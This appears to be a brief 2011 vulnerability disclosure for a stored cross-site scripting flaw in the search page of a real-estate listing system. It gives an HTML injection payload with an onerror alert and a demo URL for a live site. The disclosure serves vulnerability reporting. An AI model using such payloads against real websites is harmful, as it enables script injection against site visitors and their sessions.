# Exploit Title: Commodity Real Estate System Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

Cross Site Scripting can be done using the command input

Vulnerable Page:
searchproperty (Search Modules)

Exploit:
"/></a></><img src=1.gif onerror=alert(1)>

Demo:
http://realestate.commodityrentals.com/searchproperty


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr